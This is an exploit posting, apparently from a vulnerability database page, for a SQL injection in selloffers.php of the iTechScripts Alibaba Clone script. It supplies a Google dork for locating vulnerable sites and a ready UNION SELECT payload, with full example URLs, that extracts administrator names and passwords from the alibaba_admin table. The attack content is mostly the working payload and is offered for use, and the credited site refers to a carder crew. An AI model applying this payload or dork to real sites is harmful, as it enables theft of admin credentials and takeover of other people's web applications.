iTechScripts Alibaba Clone (selloffers.php) SQL Injection Vulnerability

2010.11.18

Credit: v3n0m

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

-----------------------------------------------------------------------

iTechScripts Alibaba Clone (selloffers.php) SQL Injection Vulnerability

-----------------------------------------------------------------------

Author  	: v3n0m

Site    	: http://yogyacarderlink.web.id/

Date		: November, 16-2010

Location	: Jakarta, Indonesia

Time Zone	: GMT +7:00

Application	: Alibaba Clone

Price		: $199.00

Vendor  	: http://itechscripts.com/

Google Dork	: "Powered by iTechScripts"

Exploit & p0c

_____________

-9999+union+select+all+1,group_concat(ali_admin_name,char(58),ali_pwd),3,4,5,6,7,8+from+alibaba_admin--

http://127.0.0.1/[path]/selloffers.php?cid=[SQLi]

http://127.0.0.1/[path]/selloffers.php?cid=-9999+union+select+all+1,group_concat(ali_admin_name,char(58),ali_pwd),3,4,5,6,7,8+from+alibaba_admin--

ShoutZ

______

All YOGYACARDERLINK CREW, GheMaX, LeQhi

Also Jovita & Fabian :)

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

iTechScripts Alibaba Clone (selloffers.php) SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.